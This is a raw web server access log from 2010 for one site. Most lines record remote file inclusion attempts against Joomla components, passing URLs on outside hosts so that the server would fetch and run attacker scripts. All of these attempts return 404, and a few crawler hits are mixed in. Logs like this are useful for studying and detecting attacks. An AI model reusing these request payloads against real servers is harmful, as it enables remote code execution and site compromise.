165.132.30.11 - - [09/Mar/2010:13:19:40 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:13:19:40 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:13:19:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.224.132.89 - - [09/Mar/2010:13:20:15 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.224.132.89 - - [09/Mar/2010:13:20:15 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.224.132.89 - - [09/Mar/2010:13:20:15 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.224.132.89 - - [09/Mar/2010:13:21:00 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.175.197.86 - - [09/Mar/2010:13:21:14 -0800] "GET /logs/access_100117.log//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.224.132.89 - - [09/Mar/2010:13:23:47 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.224.132.89 - - [09/Mar/2010:13:23:47 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.224.132.89 - - [09/Mar/2010:13:23:47 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.224.132.89 - - [09/Mar/2010:13:24:00 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
174.133.164.82 - - [09/Mar/2010:13:24:14 -0800] "GET /logs/access.log%20%20/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
174.133.164.82 - - [09/Mar/2010:13:24:14 -0800] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
174.133.164.82 - - [09/Mar/2010:13:24:14 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:13:24:33 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.175.197.86 - - [09/Mar/2010:13:25:01 -0800] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.175.197.86 - - [09/Mar/2010:13:25:01 -0800] "GET /logs/access_100226.log%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.175.197.86 - - [09/Mar/2010:13:25:01 -0800] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.175.197.86 - - [09/Mar/2010:13:25:15 -0800] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.175.197.86 - - [09/Mar/2010:13:25:18 -0800] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.175.197.86 - - [09/Mar/2010:13:25:18 -0800] "GET /logs/access_100226.log%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.175.197.86 - - [09/Mar/2010:13:25:53 -0800] "GET /logs/access_100117.log%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.175.197.86 - - [09/Mar/2010:13:26:06 -0800] "GET /logs/access_100117.log%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.224.132.89 - - [09/Mar/2010:13:27:40 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.224.132.89 - - [09/Mar/2010:13:27:40 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.224.132.89 - - [09/Mar/2010:13:27:40 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:13:30:43 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:13:30:43 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:13:30:43 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:13:30:45 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:13:30:45 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:13:30:45 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
174.133.164.82 - - [09/Mar/2010:13:32:14 -0800] "GET /logs/access_100226.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.163.171.205 - - [09/Mar/2010:13:33:51 -0800] "GET /blog/feed/ HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:13:35:20 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:13:35:20 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:13:35:20 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
174.133.164.82 - - [09/Mar/2010:13:35:52 -0800] "GET /logs/access.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.hee.edu.vn/css/fid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.106.132.3 - - [09/Mar/2010:13:38:34 -0800] "GET /logs/access_100226.log%20%20/errors.php?mosConfig_live_site=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.106.132.3 - - [09/Mar/2010:13:38:34 -0800] "GET /errors.php?mosConfig_live_site=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.106.132.3 - - [09/Mar/2010:13:38:34 -0800] "GET /logs/errors.php?mosConfig_live_site=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.106.132.3 - - [09/Mar/2010:13:38:39 -0800] "GET /errors.php?mosConfig_live_site=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.106.132.3 - - [09/Mar/2010:13:38:39 -0800] "GET /logs/access_100226.log%20%20/errors.php?mosConfig_live_site=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.106.132.3 - - [09/Mar/2010:13:38:39 -0800] "GET /logs/errors.php?mosConfig_live_site=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.106.132.3 - - [09/Mar/2010:13:39:05 -0800] "GET /errors.php?mosConfig_live_site=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.106.132.3 - - [09/Mar/2010:13:39:06 -0800] "GET /logs/access_100226.log%20%20/errors.php?mosConfig_live_site=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
87.106.132.3 - - [09/Mar/2010:13:39:06 -0800] "GET /logs/errors.php?mosConfig_live_site=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
38.107.191.100 - - [09/Mar/2010:13:39:36 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "colorlessgreen.net"
38.107.191.101 - - [09/Mar/2010:13:39:39 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:13:40:50 -0800] "GET /errors.php?mosConfig_live_site=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:13:40:54 -0800] "GET /logs/access_100226.log%20%20/errors.php?mosConfig_live_site=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:13:40:54 -0800] "GET /logs/errors.php?mosConfig_live_site=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"